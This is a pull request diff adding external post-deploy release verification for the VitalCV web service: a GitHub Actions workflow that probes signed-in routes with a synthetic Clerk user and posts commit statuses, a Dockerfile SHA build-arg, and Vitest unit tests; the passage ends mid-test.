### PR TITLE
feat(ops): durable release monitoring for the web service

### DIFF
--- a/.github/workflows/release-verify.yml
+++ b/.github/workflows/release-verify.yml
@@ -1,0 +1,131 @@
+name: Release verify
+
+# Durable, external post-deploy verification of the VitalCV web service.
+#
+# Triggered by the Railway deploy webhook — Railway POSTs to
+# /api/internal/release-monitor/webhook, which fires a repository_dispatch here.
+# Also runs on a schedule (safety net if a webhook is ever missed) and can be
+# dispatched manually. The verification runs on a GitHub runner — an EXTERNAL
+# vantage, never inside the web container it tests (the P0 root cause was an
+# in-container hairpin self-fetch).
+#
+# It mints a synthetic clinician, reaches the six signed-in /holder surfaces
+# with no /auth/error and no redirect loop, checks the served SHA + the
+# /auth/resolving interstitial, runs `pnpm check:deploy`, and records a DURABLE
+# GitHub commit status (context "vitalcv/release-verified") on the verified SHA.
+#
+# Required repo secrets: CLERK_SECRET_KEY, RAILWAY_API_TOKEN. Optional:
+# CLERK_FAPI_URL (default https://clerk.vitalcv.com), RELEASE_PROBE_BASE
+# (default https://vitalcv.com). GITHUB_TOKEN is automatic (statuses: write).
+# See docs/deployment/release-monitoring.md.
+
+on:
+  repository_dispatch:
+    types: [release-verify]
+  workflow_dispatch:
+    inputs:
+      target_sha:
+        description: 'Deploy commit to verify (optional; defaults to main HEAD)'
+        required: false
+        default: ''
+  schedule:
+    - cron: '*/30 * * * *'
+
+concurrency:
+  # Never run two verifications against prod at once; do not cancel one mid-run.
+  group: release-verify
+  cancel-in-progress: false
+
+permissions:
+  contents: read
+  statuses: write
+
+jobs:
+  verify:
+    name: Verify signed-in release
+    if: github.ref == 'refs/heads/main'
+    runs-on: ubuntu-latest
+    timeout-minutes: 15
+    steps:
+      - uses: actions/checkout@v4
+
+      - uses: pnpm/action-setup@v4
+        with:
+          version: 10.6.1
+
+      - uses: actions/setup-node@v4
+        with:
+          node-version: 24
+
+      # No `pnpm install`: the runner imports only local .ts + Node built-ins,
+      # and the check:deploy subprocess is self-contained. Skipping the monorepo
+      # install keeps this fast.
+
+      - name: Resolve target commit
+        id: target
+        run: |
+          SHA="${{ github.event.client_payload.commit || github.event.inputs.target_sha }}"
+          echo "sha=${SHA}" >> "$GITHUB_OUTPUT"
+          echo "Target SHA: ${SHA:-<main HEAD>}"
+
+      - name: Run release verification
+        id: verify
+        continue-on-error: true
+        env:
+          RELEASE_PROBE_BASE: ${{ secrets.RELEASE_PROBE_BASE || 'https://vitalcv.com' }}
+          RELEASE_TARGET_SHA: ${{ steps.target.outputs.sha }}
+          CLERK_SECRET_KEY: ${{ secrets.CLERK_SECRET_KEY }}
+          CLERK_FAPI_URL: ${{ secrets.CLERK_FAPI_URL }}
+          RAILWAY_API_TOKEN: ${{ secrets.RAILWAY_API_TOKEN }}
+          RELEASE_REPORT_OUT: report.json
+        run: pnpm verify:release
+
+      - name: Record commit status + job summary
+        if: always()
+        env:
+          GH_TOKEN: ${{ github.token }}
+          RUN_URL: ${{ github.server_url }}/${{ github.repository }}/actions/runs/${{ github.run_id }}
+        run: |
+          if [ "${{ steps.verify.outcome }}" = "success" ]; then STATE=success; else STATE=failure; fi
+
+          SHA=""
+          DESC="release verification"
+          if [ -f report.json ]; then
+            # Mark the commit the container was actually serving.
+            SHA=$(jq -r '.containerSha // .targetSha // .mainSha // empty' report.json)
+            OVERALL=$(jq -r '.overall // "unknown"' report.json)
+            FAILED=$(jq -r '(.failedChecks // []) | join(", ")' report.json)
+            HOLDER_OK=$(jq -r '[.checks[]? | select((.name|startswith("holder")) and .ok)] | length' report.json)
+            HOLDER_TOTAL=$(jq -r '[.checks[]? | select(.name|startswith("holder"))] | length' report.json)
+            DESC="${OVERALL}: holder ${HOLDER_OK}/${HOLDER_TOTAL}${FAILED:+; failed ${FAILED}}"
+          fi
+          [ -z "$SHA" ] && SHA="${{ steps.target.outputs.sha }}"
+          [ -z "$SHA" ] && SHA="${{ github.sha }}"
+          DESC=$(printf '%s' "$DESC" | cut -c1-140)
+
+          echo "commit status → $STATE @ $SHA — $DESC"
+          gh api -X POST "repos/${{ github.repository }}/statuses/${SHA}" \
+            -f state="$STATE" \
+            -f context="vitalcv/release-verified" \
+            -f description="$DESC" \
+            -f target_url="$RUN_URL" >/dev/null
+
+          {
+            echo "## Release verification: ${STATE}"
+            echo ""
+            echo "- Commit: \`${SHA}\`"
+            echo "- ${DESC}"
+            echo "- [Run details](${RUN_URL})"
+            if [ -f report.json ]; then
+              echo ""
+              echo '```json'
+              jq '{overall, targetSha, mainSha, containerSha, failedChecks, cleanup}' report.json
+              echo '```'
+            fi
+          } >> "$GITHUB_STEP_SUMMARY"
+
+      - name: Fail the job when verification failed
+        if: steps.verify.outcome != 'success'
+        run: |
+          echo "::error::Release verification failed — see the vitalcv/release-verified commit status and the job summary." >&2
+          exit 1

--- a/.github/workflows/release-verify.yml
+++ b/.github/workflows/release-verify.yml
@@ -63,14 +63,28 @@ jobs:
 
       - name: Resolve target commit
         id: target
+        env:
+          # UNTRUSTED input (repository_dispatch client_payload / manual input).
+          # Passed via env — never interpolated into shell source (classic GHA
+          # script-injection channel) — and reduced to a hex SHA or empty before
+          # any later step consumes it.
+          RAW_SHA: ${{ github.event.client_payload.commit || github.event.inputs.target_sha }}
         run: |
-          SHA="${{ github.event.client_payload.commit || github.event.inputs.target_sha }}"
+          SHA=""
+          if printf '%s' "${RAW_SHA}" | grep -qiE '^[0-9a-f]{7,40}$'; then
+            SHA="${RAW_SHA}"
+          elif [ -n "${RAW_SHA}" ]; then
+            echo "::warning::Ignoring non-SHA target input"
+          fi
           echo "sha=${SHA}" >> "$GITHUB_OUTPUT"
-          echo "Target SHA: ${SHA:-<main HEAD>}"
+          echo "Target SHA: ${SHA:-(main HEAD)}"
 
       - name: Run release verification
         id: verify
         continue-on-error: true
+        # Bounded below the job budget so the status-recording step ALWAYS has
+        # time to run — a hung verification must still yield a red commit status.
+        timeout-minutes: 12
         env:
           RELEASE_PROBE_BASE: ${{ secrets.RELEASE_PROBE_BASE || 'https://vitalcv.com' }}
           RELEASE_TARGET_SHA: ${{ steps.target.outputs.sha }}
@@ -85,26 +99,36 @@ jobs:
         env:
           GH_TOKEN: ${{ github.token }}
           RUN_URL: ${{ github.server_url }}/${{ github.repository }}/actions/runs/${{ github.run_id }}
+          REPO: ${{ github.repository }}
+          HEAD_SHA: ${{ github.sha }}
+          TARGET_SHA: ${{ steps.target.outputs.sha }}
+          VERIFY_OUTCOME: ${{ steps.verify.outcome }}
         run: |
-          if [ "${{ steps.verify.outcome }}" = "success" ]; then STATE=success; else STATE=failure; fi
+          if [ "$VERIFY_OUTCOME" = "success" ]; then STATE=success; else STATE=failure; fi
 
           SHA=""
           DESC="release verification"
           if [ -f report.json ]; then
-            # Mark the commit the container was actually serving.
-            SHA=$(jq -r '.containerSha // .targetSha // .mainSha // empty' report.json)
+            # The status lands on the commit we INTENDED to verify (the deploy
+            # commit), falling back to the served/main sha for scheduled runs.
+            # Never containerSha-first: a failed rollout would repaint the OLD
+            # still-serving commit's green status red and leave the new commit
+            # with no status at all.
+            SHA=$(jq -r '.targetSha // .containerSha // .mainSha // empty' report.json)
             OVERALL=$(jq -r '.overall // "unknown"' report.json)
             FAILED=$(jq -r '(.failedChecks // []) | join(", ")' report.json)
             HOLDER_OK=$(jq -r '[.checks[]? | select((.name|startswith("holder")) and .ok)] | length' report.json)
             HOLDER_TOTAL=$(jq -r '[.checks[]? | select(.name|startswith("holder"))] | length' report.json)
             DESC="${OVERALL}: holder ${HOLDER_OK}/${HOLDER_TOTAL}${FAILED:+; failed ${FAILED}}"
           fi
-          [ -z "$SHA" ] && SHA="${{ steps.target.outputs.sha }}"
-          [ -z "$SHA" ] && SHA="${{ github.sha }}"
+          [ -z "$SHA" ] && SHA="$TARGET_SHA"
+          [ -z "$SHA" ] && SHA="$HEAD_SHA"
+          # Defense in depth: only ever POST a status to a hex commit ref.
+          if ! printf '%s' "$SHA" | grep -qiE '^[0-9a-f]{7,40}$'; then SHA="$HEAD_SHA"; fi
           DESC=$(printf '%s' "$DESC" | cut -c1-140)
 
           echo "commit status → $STATE @ $SHA — $DESC"
-          gh api -X POST "repos/${{ github.repository }}/statuses/${SHA}" \
+          gh api -X POST "repos/${REPO}/statuses/${SHA}" \
             -f state="$STATE" \
             -f context="vitalcv/release-verified" \
             -f description="$DESC" \

--- a/apps/web/Dockerfile
+++ b/apps/web/Dockerfile
@@ -36,6 +36,14 @@ RUN pnpm turbo run build --filter @vitalcv/web
 
 FROM base AS runtime
 ENV NODE_ENV=production
+# Build-time commit provenance fallback. On Railway, RAILWAY_GIT_COMMIT_SHA is
+# injected at RUNTIME and takes precedence (see lib/deployInfo.ts) — this ARG
+# only backs a plain `docker build --build-arg GIT_COMMIT_SHA=$(git rev-parse HEAD)`
+# so /api/version still reports a real SHA off-Railway. Uses a distinct var name
+# (GIT_SHA, not RAILWAY_GIT_COMMIT_SHA) so an empty build-arg can never shadow
+# Railway's runtime injection.
+ARG GIT_COMMIT_SHA=""
+ENV GIT_SHA=${GIT_COMMIT_SHA}
 COPY --from=build /app/apps/web/.next ./apps/web/.next
 COPY --from=build /app/apps/web/public ./apps/web/public
 COPY --from=build /app/apps/web/package.json ./apps/web/

--- a/apps/web/__tests__/release-monitor-holder-routes.test.ts
+++ b/apps/web/__tests__/release-monitor-holder-routes.test.ts
@@ -1,0 +1,77 @@
+import { describe, expect, it } from 'vitest';
+import {
+  HOLDER_ROUTES,
+  analyzeNavigation,
+  isAuthErrorPath,
+  isResolvingPath,
+  isSignInPath,
+  pathOf,
+  type NavHop,
+} from '../lib/release-monitor/holderRoutes';
+
+describe('HOLDER_ROUTES', () => {
+  it('is exactly the six required signed-in surfaces', () => {
+    expect(HOLDER_ROUTES).toEqual([
+      '/holder',
+      '/holder/home',
+      '/holder/readiness',
+      '/holder/opportunities',
+      '/holder/applications',
+      '/holder/timeline',
+    ]);
+  });
+});
+
+describe('path predicates', () => {
+  it('classify paths and absolute URLs alike', () => {
+    expect(isAuthErrorPath('/auth/error')).toBe(true);
+    expect(isAuthErrorPath('https://vitalcv.com/auth/error?x=1')).toBe(true);
+    expect(isAuthErrorPath('/holder')).toBe(false);
+    expect(isSignInPath('/sign-in?redirect_url=/holder')).toBe(true);
+    expect(isResolvingPath('/auth/resolving')).toBe(true);
+    expect(pathOf('https://x.com/a/b?q=1#h')).toBe('/a/b');
+  });
+});
+
+describe('analyzeNavigation', () => {
+  it('passes a single clean 200', () => {
+    const out = analyzeNavigation([{ url: '/holder', status: 200 }]);
+    expect(out.ok).toBe(true);
+    expect(out.finalStatus).toBe(200);
+  });
+
+  it('fails when any hop redirects to /auth/error (the P0 signature)', () => {
+    const hops: NavHop[] = [
+      { url: '/holder', status: 307, location: '/auth/error' },
+      { url: '/auth/error', status: 200 },
+    ];
+    const out = analyzeNavigation(hops);
+    expect(out.ok).toBe(false);
+    expect(out.reason).toBe('auth_error');
+  });
+
+  it('fails on a redirect loop (repeated path)', () => {
+    const hops: NavHop[] = [
+      { url: '/holder', status: 307, location: '/holder' },
+      { url: '/holder', status: 307, location: '/holder' },
+    ];
+    expect(analyzeNavigation(hops).reason).toBe('redirect_loop');
+  });
+
+  it('fails when bounced to /sign-in', () => {
+    const out = analyzeNavigation([{ url: '/holder', status: 307, location: '/sign-in?redirect_url=/holder' }]);
+    expect(out.reason).toBe('sign_in');
+  });
+
+  it('fails a terminal 3xx as too_many_hops', () => {
+    expect(analyzeNavigation([{ url: '/holder', status: 307, location: '/elsewhere' }]).reason).toBe('too_many_hops');
+  });
+
+  it('fails a terminal non-200 non-3xx', () => {
+    expect(analyzeNavigation([{ url: '/holder', status: 500 }]).reason).toBe('non_200');
+  });
+
+  it('fails an empty chain', () => {
+    expect(analyzeNavigation([]).reason).toBe('no_hops');
+  });
+});

--- a/apps/web/__tests__/release-monitor-holder-routes.test.ts
+++ b/apps/web/__tests__/release-monitor-holder-routes.test.ts
@@ -63,6 +63,25 @@ describe('analyzeNavigation', () => {
     expect(out.reason).toBe('sign_in');
   });
 
+  it('fails a role-mismatch redirect that 200s on the WRONG surface', () => {
+    // middleware getMismatchRedirect: wrong-role user → its ROLE_LANDING, which 200s.
+    const hops: NavHop[] = [
+      { url: '/holder', status: 307, location: '/verifier' },
+      { url: '/verifier', status: 200 },
+    ];
+    const out = analyzeNavigation(hops, '/holder');
+    expect(out.ok).toBe(false);
+    expect(out.reason).toBe('wrong_destination');
+  });
+
+  it('accepts the expected path exactly, as a parent, and with query strings', () => {
+    expect(analyzeNavigation([{ url: '/holder/home', status: 200 }], '/holder/home').ok).toBe(true);
+    expect(analyzeNavigation([{ url: '/holder/home?tab=x', status: 200 }], '/holder/home').ok).toBe(true);
+    expect(analyzeNavigation([{ url: '/holder/home/detail', status: 200 }], '/holder/home').ok).toBe(true);
+    // /holder-admin must NOT satisfy /holder (prefix, not path-segment, match)
+    expect(analyzeNavigation([{ url: '/holder-admin', status: 200 }], '/holder').reason).toBe('wrong_destination');
+  });
+
   it('fails a terminal 3xx as too_many_hops', () => {
     expect(analyzeNavigation([{ url: '/holder', status: 307, location: '/elsewhere' }]).reason).toBe('too_many_hops');
   });

--- a/apps/web/__tests__/release-monitor-synthetic.test.ts
+++ b/apps/web/__tests__/release-monitor-synthetic.test.ts
@@ -3,9 +3,31 @@ import {
   cleanupClinician,
   mintClinicianSession,
   reachRoute,
+  safeErrorBody,
   warmUpClinicianSession,
   type SyntheticClinicianDeps,
 } from '../lib/release-monitor/syntheticClinician';
+
+describe('safeErrorBody', () => {
+  it('keeps only code + message from a Clerk error envelope', () => {
+    const out = safeErrorBody(JSON.stringify({ errors: [{ code: 'form_identifier_exists', message: 'taken', meta: {} }] }));
+    expect(out).toContain('form_identifier_exists');
+    expect(out).toContain('taken');
+  });
+
+  it('redacts long token-like fragments and never echoes a raw ticket/secret body', () => {
+    const leaky = JSON.stringify({ errors: [{ code: 'x', message: 'ticket abcdef0123456789ABCDEFghij failed' }], ticket: 'st_supersecretvalue_0123456789' });
+    const out = safeErrorBody(leaky);
+    expect(out).not.toContain('supersecretvalue');
+    expect(out).not.toContain('abcdef0123456789ABCDEFghij');
+    expect(out).toContain('[redacted]');
+  });
+
+  it('never throws on non-JSON or empty bodies', () => {
+    expect(safeErrorBody('<html>502</html>')).toBe('clerk error (unparseable body)');
+    expect(safeErrorBody('{}')).toBe('clerk error (no safe fields)');
+  });
+});
 
 function jsonRes(body: unknown, opts: { status?: number; setCookie?: string[] } = {}): Response {
   const headers = new Headers();

--- a/apps/web/__tests__/release-monitor-synthetic.test.ts
+++ b/apps/web/__tests__/release-monitor-synthetic.test.ts
@@ -101,6 +101,26 @@ describe('mintClinicianSession', () => {
     expect(r.ok).toBe(false);
     expect(r.created).toEqual({ userId: 'user_x', orgId: 'org_x' });
   });
+
+  it('reports created ids INCREMENTALLY (before mint returns) so a mid-mint kill can clean up', async () => {
+    const snapshots: Array<{ userId: string | null; orgId: string | null }> = [];
+    const fetchImpl = vi.fn(async (url: string | URL) => {
+      const u = String(url);
+      if (u.includes('/v1/users')) return jsonRes({ id: 'user_x' });
+      if (u.includes('/v1/organizations')) return jsonRes({ id: 'org_x' });
+      // Hang-analogue: fail right after both resources exist.
+      if (u.includes('/v1/sign_in_tokens')) return jsonRes({ errors: [{ code: 'x' }] }, { status: 500 });
+      return jsonRes({});
+    });
+    await mintClinicianSession({
+      ...base,
+      fetchImpl: fetchImpl as unknown as typeof fetch,
+      onResourceCreated: (c) => snapshots.push({ ...c }),
+    });
+    // The user id was reported the instant it existed — not only at return.
+    expect(snapshots[0]).toEqual({ userId: 'user_x', orgId: null });
+    expect(snapshots.at(-1)).toEqual({ userId: 'user_x', orgId: 'org_x' });
+  });
 });
 
 describe('cleanupClinician', () => {

--- a/apps/web/__tests__/release-monitor-synthetic.test.ts
+++ b/apps/web/__tests__/release-monitor-synthetic.test.ts
@@ -59,6 +59,14 @@ describe('mintClinicianSession', () => {
     ]);
   });
 
+  it('fails fast with a clear message when CLERK_SECRET_KEY is empty', async () => {
+    const fetchImpl = vi.fn();
+    const r = await mintClinicianSession({ ...base, clerkSecretKey: '', fetchImpl: fetchImpl as unknown as typeof fetch });
+    expect(r.ok).toBe(false);
+    expect(r.error).toContain('CLERK_SECRET_KEY');
+    expect(fetchImpl).not.toHaveBeenCalled();
+  });
+
   it('returns the created ids for cleanup even when a later step fails', async () => {
     const fetchImpl = vi.fn(async (url: string | URL) => {
       const u = String(url);
@@ -135,6 +143,16 @@ describe('warmUpClinicianSession', () => {
     const r = await warmUpClinicianSession(deps(fetchImpl), { ...session, cookies: { ...session.cookies } });
     expect(r.ok).toBe(true);
   });
+
+  it('fails when the session resolves to the WRONG role landing (200 off /holder)', async () => {
+    // e.g. role resolved as AUTHENTICATED → middleware redirects /holder → /intelligence, which 200s
+    const fetchImpl = vi.fn(async (url: string | URL) =>
+      String(url).includes('/intelligence') ? jsonRes({}) : redirectRes('/intelligence'),
+    );
+    const r = await warmUpClinicianSession(deps(fetchImpl), { ...session, cookies: { ...session.cookies } });
+    expect(r.ok).toBe(false);
+    expect(r.reason).toContain('wrong_destination');
+  });
 });
 
 describe('reachRoute', () => {
@@ -149,5 +167,14 @@ describe('reachRoute', () => {
     const r = await reachRoute(deps(vi.fn(async () => redirectRes('/auth/error'))), session, '/holder/home');
     expect(r.ok).toBe(false);
     expect(r.reason).toBe('auth_error');
+  });
+
+  it('a role-mismatch redirect that 200s elsewhere → wrong_destination fail', async () => {
+    const fetchImpl = vi.fn(async (url: string | URL) =>
+      String(url).includes('/verifier') ? jsonRes({}) : redirectRes('/verifier'),
+    );
+    const r = await reachRoute(deps(fetchImpl), session, '/holder/home');
+    expect(r.ok).toBe(false);
+    expect(r.reason).toBe('wrong_destination');
   });
 });

--- a/apps/web/__tests__/release-monitor-synthetic.test.ts
+++ b/apps/web/__tests__/release-monitor-synthetic.test.ts
@@ -1,0 +1,153 @@
+import { describe, expect, it, vi } from 'vitest';
+import {
+  cleanupClinician,
+  mintClinicianSession,
+  reachRoute,
+  warmUpClinicianSession,
+  type SyntheticClinicianDeps,
+} from '../lib/release-monitor/syntheticClinician';
+
+function jsonRes(body: unknown, opts: { status?: number; setCookie?: string[] } = {}): Response {
+  const headers = new Headers();
+  headers.set('content-type', 'application/json');
+  for (const c of opts.setCookie ?? []) headers.append('set-cookie', c);
+  return new Response(JSON.stringify(body), { status: opts.status ?? 200, headers });
+}
+
+function redirectRes(location: string, status = 307): Response {
+  return new Response(null, { status, headers: new Headers({ location }) });
+}
+
+const base: Omit<SyntheticClinicianDeps, 'fetchImpl'> = {
+  clerkSecretKey: 'sk_test',
+  appBase: 'https://vitalcv.com',
+  runId: 'test1',
+};
+
+describe('mintClinicianSession', () => {
+  it('runs the full Clerk + FAPI sequence in order and seeds the cookie jar', async () => {
+    const calls: string[] = [];
+    const fetchImpl = vi.fn(async (url: string | URL, init?: RequestInit) => {
+      const u = String(url);
+      calls.push(`${init?.method ?? 'GET'} ${u.split('?')[0]}`);
+      if (u.includes('/v1/users')) return jsonRes({ id: 'user_1' });
+      if (u.includes('/v1/organizations')) return jsonRes({ id: 'org_1' });
+      if (u.includes('/v1/sign_in_tokens')) return jsonRes({ token: 'tik_1' });
+      if (u.includes('/v1/client/sign_ins')) {
+        return jsonRes({ response: { created_session_id: 'sess_1', status: 'complete' }, client: {} }, { setCookie: ['__client=c1; Path=/'] });
+      }
+      if (u.includes('/touch')) return jsonRes({ response: {} }, { setCookie: ['__client_uat=1700; Path=/'] });
+      if (u.includes('/tokens')) return jsonRes({ jwt: 'jwt_1' });
+      return jsonRes({});
+    });
+
+    const r = await mintClinicianSession({ ...base, fetchImpl: fetchImpl as unknown as typeof fetch, now: () => 1_700_000_000_000 });
+    expect(r.ok).toBe(true);
+    expect(r.session?.userId).toBe('user_1');
+    expect(r.session?.orgId).toBe('org_1');
+    expect(r.session?.sessionId).toBe('sess_1');
+    expect(r.session?.jwt).toBe('jwt_1');
+    expect(r.session?.cookies.__session).toBe('jwt_1');
+    expect(r.session?.cookies.__client_uat).toBe('1700');
+    expect(calls).toEqual([
+      'POST https://api.clerk.com/v1/users',
+      'POST https://api.clerk.com/v1/organizations',
+      'POST https://api.clerk.com/v1/sign_in_tokens',
+      'POST https://clerk.vitalcv.com/v1/client/sign_ins',
+      'POST https://clerk.vitalcv.com/v1/client/sessions/sess_1/touch',
+      'POST https://clerk.vitalcv.com/v1/client/sessions/sess_1/tokens',
+    ]);
+  });
+
+  it('returns the created ids for cleanup even when a later step fails', async () => {
+    const fetchImpl = vi.fn(async (url: string | URL) => {
+      const u = String(url);
+      if (u.includes('/v1/users')) return jsonRes({ id: 'user_x' });
+      if (u.includes('/v1/organizations')) return jsonRes({ id: 'org_x' });
+      if (u.includes('/v1/sign_in_tokens')) return jsonRes({ error: 'nope' }, { status: 500 });
+      return jsonRes({});
+    });
+    const r = await mintClinicianSession({ ...base, fetchImpl: fetchImpl as unknown as typeof fetch });
+    expect(r.ok).toBe(false);
+    expect(r.created).toEqual({ userId: 'user_x', orgId: 'org_x' });
+  });
+});
+
+describe('cleanupClinician', () => {
+  it('deletes org then user', async () => {
+    const calls: string[] = [];
+    const fetchImpl = vi.fn(async (url: string | URL, init?: RequestInit) => {
+      calls.push(`${init?.method} ${String(url)}`);
+      return new Response(null, { status: 200 });
+    });
+    const r = await cleanupClinician({ ...base, fetchImpl: fetchImpl as unknown as typeof fetch }, { userId: 'user_1', orgId: 'org_1' });
+    expect(r.ok).toBe(true);
+    expect(calls).toEqual([
+      'DELETE https://api.clerk.com/v1/organizations/org_1',
+      'DELETE https://api.clerk.com/v1/users/user_1',
+    ]);
+  });
+
+  it('is a no-op when nothing was created', async () => {
+    const fetchImpl = vi.fn();
+    const r = await cleanupClinician({ ...base, fetchImpl: fetchImpl as unknown as typeof fetch }, { userId: null, orgId: null });
+    expect(r.attempted).toBe(false);
+    expect(fetchImpl).not.toHaveBeenCalled();
+  });
+});
+
+const session = {
+  userId: 'user_1',
+  orgId: 'org_1',
+  sessionId: 'sess_1',
+  jwt: 'jwt',
+  clientUat: '1',
+  cookies: { __session: 'jwt', __client_uat: '1' } as Record<string, string>,
+  email: 'svc@vitalcv-monitor.local',
+};
+
+describe('warmUpClinicianSession', () => {
+  const deps = (fetchImpl: unknown): SyntheticClinicianDeps => ({ ...base, fetchImpl: fetchImpl as typeof fetch });
+
+  it('passes when cold /holder returns 200 (the #503 cookie-on-resolve shape)', async () => {
+    const fetchImpl = vi.fn(async () => jsonRes({}, { setCookie: ['vitalcv_role=CLINICIAN.x.y; Path=/'] }));
+    const r = await warmUpClinicianSession(deps(fetchImpl), { ...session, cookies: { ...session.cookies } });
+    expect(r.ok).toBe(true);
+  });
+
+  it('detects the P0: cold /holder → /auth/error', async () => {
+    const fetchImpl = vi.fn(async () => redirectRes('/auth/error'));
+    const r = await warmUpClinicianSession(deps(fetchImpl), { ...session, cookies: { ...session.cookies } });
+    expect(r.ok).toBe(false);
+    expect(r.reason).toBe('auth_error');
+  });
+
+  it('emulates the #507 interstitial: /holder → /auth/resolving → resolve-role → /holder 200', async () => {
+    let holderHits = 0;
+    const fetchImpl = vi.fn(async (url: string | URL) => {
+      const u = String(url);
+      if (u.includes('/api/auth/resolve-role')) {
+        return jsonRes({ role: 'CLINICIAN' }, { setCookie: ['vitalcv_role=CLINICIAN.x.y; Path=/'] });
+      }
+      holderHits += 1;
+      return holderHits === 1 ? redirectRes('/auth/resolving?redirect_url=/holder') : jsonRes({});
+    });
+    const r = await warmUpClinicianSession(deps(fetchImpl), { ...session, cookies: { ...session.cookies } });
+    expect(r.ok).toBe(true);
+  });
+});
+
+describe('reachRoute', () => {
+  const deps = (fetchImpl: unknown): SyntheticClinicianDeps => ({ ...base, fetchImpl: fetchImpl as typeof fetch });
+
+  it('200 → ok', async () => {
+    const r = await reachRoute(deps(vi.fn(async () => jsonRes({}))), session, '/holder/home');
+    expect(r.ok).toBe(true);
+  });
+
+  it('a redirect to /auth/error → fail', async () => {
+    const r = await reachRoute(deps(vi.fn(async () => redirectRes('/auth/error'))), session, '/holder/home');
+    expect(r.ok).toBe(false);
+    expect(r.reason).toBe('auth_error');
+  });
+});

--- a/apps/web/__tests__/release-monitor-verify.test.ts
+++ b/apps/web/__tests__/release-monitor-verify.test.ts
@@ -1,0 +1,95 @@
+import { describe, expect, it, vi } from 'vitest';
+import { runReleaseVerification, type VerifyDeps } from '../lib/release-monitor/verify';
+import { HOLDER_ROUTES } from '../lib/release-monitor/holderRoutes';
+import type { ClinicianSession } from '../lib/release-monitor/syntheticClinician';
+
+const session = { userId: 'u', orgId: 'o', sessionId: 's', jwt: 'j', clientUat: '1', cookies: {}, email: 'e' } as ClinicianSession;
+
+function baseDeps(over: Partial<VerifyDeps> = {}): VerifyDeps {
+  return {
+    base: 'https://vitalcv.com',
+    containerSha: 'abc',
+    mainSha: 'abc',
+    targetSha: 'abc',
+    isoNow: () => '2026-07-03T00:00:00.000Z',
+    probeResolving: async () => ({ status: 200 }),
+    mint: async () => ({ ok: true, created: { userId: 'u', orgId: 'o' }, session }),
+    warmUp: async () => ({ ok: true, hops: [{ url: '/holder', status: 200 }] }),
+    refresh: async () => true,
+    reach: async () => ({ ok: true, finalStatus: 200, finalUrl: '/holder', hops: 1 }),
+    runDeployCheck: async () => ({ ok: true, detail: 'ok' }),
+    cleanup: async () => ({ attempted: true, ok: true, detail: 'deleted' }),
+    ...over,
+  };
+}
+
+describe('runReleaseVerification', () => {
+  it('passes when every check is green and always cleans up', async () => {
+    const r = await runReleaseVerification(baseDeps());
+    expect(r.overall).toBe('pass');
+    expect(r.failedChecks).toEqual([]);
+    // cold-start + the six routes
+    expect(r.checks.filter((c) => c.name.startsWith('holder:')).length).toBe(HOLDER_ROUTES.length + 1);
+    expect(r.cleanup.ok).toBe(true);
+  });
+
+  it('fails (critical) when the cold-start bounces to /auth/error', async () => {
+    const r = await runReleaseVerification(
+      baseDeps({ warmUp: async () => ({ ok: false, hops: [{ url: '/holder', status: 307, location: '/auth/error' }], reason: 'auth_error' }) }),
+    );
+    expect(r.overall).toBe('fail');
+    expect(r.failedChecks).toContain('holder:cold-start');
+  });
+
+  it('fails when a single route is unreachable', async () => {
+    let first = true;
+    const r = await runReleaseVerification(
+      baseDeps({
+        reach: async (_s, p) => {
+          if (first) {
+            first = false;
+            return { ok: false, finalStatus: 307, finalUrl: '/auth/error', hops: 2, reason: 'auth_error' };
+          }
+          return { ok: true, finalStatus: 200, finalUrl: p, hops: 1 };
+        },
+      }),
+    );
+    expect(r.overall).toBe('fail');
+    expect(r.failedChecks).toContain(`holder:${HOLDER_ROUTES[0]}`);
+  });
+
+  it('skips holder checks and fails when mint fails, still cleaning up the created resources', async () => {
+    const cleanup = vi.fn(async () => ({ attempted: true, ok: true, detail: 'deleted' }));
+    const r = await runReleaseVerification(
+      baseDeps({ mint: async () => ({ ok: false, created: { userId: 'u', orgId: 'o' }, error: 'clerk 500' }), cleanup }),
+    );
+    expect(r.overall).toBe('fail');
+    expect(r.failedChecks).toContain('synthetic_session');
+    expect(cleanup).toHaveBeenCalledWith({ userId: 'u', orgId: 'o' });
+  });
+
+  it('runs cleanup even when a probe throws (finally guarantee)', async () => {
+    const cleanup = vi.fn(async () => ({ attempted: true, ok: true, detail: 'deleted' }));
+    await expect(
+      runReleaseVerification(
+        baseDeps({
+          mint: async () => ({ ok: true, created: { userId: 'u', orgId: 'o' }, session }),
+          warmUp: async () => {
+            throw new Error('boom');
+          },
+          cleanup,
+        }),
+      ),
+    ).rejects.toThrow('boom');
+    expect(cleanup).toHaveBeenCalledWith({ userId: 'u', orgId: 'o' });
+  });
+
+  it('treats SHA mismatch as critical for a deploy-scoped run, reported for a scheduled run', async () => {
+    const deployScoped = await runReleaseVerification(baseDeps({ containerSha: 'old', targetSha: 'new', mainSha: 'new' }));
+    expect(deployScoped.failedChecks).toContain('web_sha');
+
+    const scheduled = await runReleaseVerification(baseDeps({ containerSha: 'old', targetSha: null, mainSha: 'new' }));
+    expect(scheduled.failedChecks).not.toContain('web_sha');
+    expect(scheduled.checks.find((c) => c.name === 'web_sha')?.ok).toBe(false);
+  });
+});

--- a/apps/web/__tests__/release-monitor-verify.test.ts
+++ b/apps/web/__tests__/release-monitor-verify.test.ts
@@ -98,12 +98,6 @@ describe('runReleaseVerification', () => {
     expect(r.checks.some((c) => c.name === 'cleanup')).toBe(false);
   });
 
-  it('invokes onCreated with the minted ids (for hard-kill cleanup)', async () => {
-    const onCreated = vi.fn();
-    await runReleaseVerification(baseDeps({ onCreated }));
-    expect(onCreated).toHaveBeenCalledWith({ userId: 'u', orgId: 'o' });
-  });
-
   it('treats SHA mismatch as critical for a deploy-scoped run, reported for a scheduled run', async () => {
     const deployScoped = await runReleaseVerification(baseDeps({ containerSha: 'old', targetSha: 'new', mainSha: 'new' }));
     expect(deployScoped.failedChecks).toContain('web_sha');

--- a/apps/web/__tests__/release-monitor-verify.test.ts
+++ b/apps/web/__tests__/release-monitor-verify.test.ts
@@ -84,6 +84,26 @@ describe('runReleaseVerification', () => {
     expect(cleanup).toHaveBeenCalledWith({ userId: 'u', orgId: 'o' });
   });
 
+  it('fails the run (critical) when synthetic-identity cleanup fails — no green while leaking', async () => {
+    const r = await runReleaseVerification(
+      baseDeps({ cleanup: async () => ({ attempted: true, ok: false, detail: 'org 500, user 500' }) }),
+    );
+    expect(r.overall).toBe('fail');
+    expect(r.failedChecks).toContain('cleanup');
+    expect(r.checks.find((c) => c.name === 'cleanup')?.detail).toContain('NOT deleted');
+  });
+
+  it('does not add a cleanup check when cleanup succeeds', async () => {
+    const r = await runReleaseVerification(baseDeps());
